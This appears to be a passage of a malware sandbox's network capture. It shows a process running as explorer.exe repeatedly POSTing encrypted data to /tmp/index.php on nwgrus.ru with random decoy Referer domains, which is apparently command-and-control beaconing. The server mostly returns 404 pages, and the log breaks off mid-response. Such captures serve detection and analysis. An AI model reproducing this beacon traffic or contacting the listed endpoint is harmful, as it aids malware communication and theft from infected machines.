Oct 8, 2024 00:20:13.360500097 CEST | 302 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 71 3d d4 a2
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuq=c[GYcb2[;;b5#pEDh)U@@T8!})C<^.zu{ZcMuk. r`tCHJ
Oct 8, 2024 00:20:14.108429909 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49757 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:14.118573904 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dlawyaqdtqgx.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 357
Host: nwgrus.ru
Oct 8, 2024 00:20:14.118573904 CEST | 357 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 59 01 ec e1
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuYo7qCRwMVl^`4}`UuM*%?.<>Sz^36KWBu/#lWV0!m[oe4F/eBxc<
Oct 8, 2024 00:20:14.977386951 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49758 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:14.987154961 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gxrfdgbwqcu.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 368
Host: nwgrus.ru
Oct 8, 2024 00:20:14.987200975 CEST | 368 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 47 29 a2 8e
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuG)^\FK=DBkw}rpk{2%'M%)[Kw<MfI[*^J8knV$^7dxAY)CWG~!Y5
Oct 8, 2024 00:20:15.764854908 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:15 GMT
Content-Type: text/html; charset=utf-8
Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49759 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:15.980737925 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mihbhgkrdwqnogym.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 287
Host: nwgrus.ru
Oct 8, 2024 00:20:15.982208014 CEST | 287 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 28 27 b9 8e
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu('W4gHeas%9dKu>\_1\f Py #@s?Kb3']K]G 5j@KG]ai%:)X
Oct 8, 2024 00:20:16.759238005 CEST | 189 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
Data Ascii: #\6Y9l_m=rA


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49761 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:18.648441076 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bhprxmbpfsifjwvd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 187
Host: nwgrus.ru
Oct 8, 2024 00:20:18.648473978 CEST | 187 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 38 59 cc eb
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA ,[k,vu8YU_}ymz:xA:)<]F:<[E#F&F&4TWNj!? <MLx3
Oct 8, 2024 00:20:19.925240040 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 8, 2024 00:20:19.925376892 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49762 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:19.943342924 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vqoayhqrgjlg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 189
Host: nwgrus.ru
Oct 8, 2024 00:20:19.943342924 CEST | 189 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 39 07 bf a1
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu9wOL1tZ{nvyeW*Lb;[?Bn,A11}H.If-!
Oct 8, 2024 00:20:20.864453077 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49763 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:20.876399040 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cmfmcxiuegbxwbfb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 173
Host: nwgrus.ru
Oct 8, 2024 00:20:20.876416922 CEST | 173 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 63 00 c7 b9
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vucU[gR_Rm#4!fMBfw2z2=\JYQdcSLgr_jV/
Oct 8, 2024 00:20:21.651169062 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49764 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:21.660253048 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bojujhdxlnt.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 243
Host: nwgrus.ru
Oct 8, 2024 00:20:21.660337925 CEST | 243 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 39 59 ba ec
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu9YEzYk,SM{uNFMk5W3L/3$Fs-0<MU`H_#<oSC%9[xQKz_';\C
Oct 8, 2024 00:20:22.408415079 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49765 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:22.419502020 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lbaiglgwxhkmq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 222
Host: nwgrus.ru
Oct 8, 2024 00:20:22.419570923 CEST | 222 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 2c 43 a3 81
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu,CJcvz2Hje2.dhQ;m>f!A@VD^B1vm+]rzg_UWF"1L~5
Oct 8, 2024 00:20:23.179668903 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49767 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:23.187813997 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oxivfaqdhau.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 292
Host: nwgrus.ru
Oct 8, 2024 00:20:23.187836885 CEST | 292 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 5f 09 b4 f1
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu_X@GdTkoWkx3MG\u~2"wq1Wak"Zv4 Ka3l~dI ui@{Q\
Oct 8, 2024 00:20:23.966139078 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 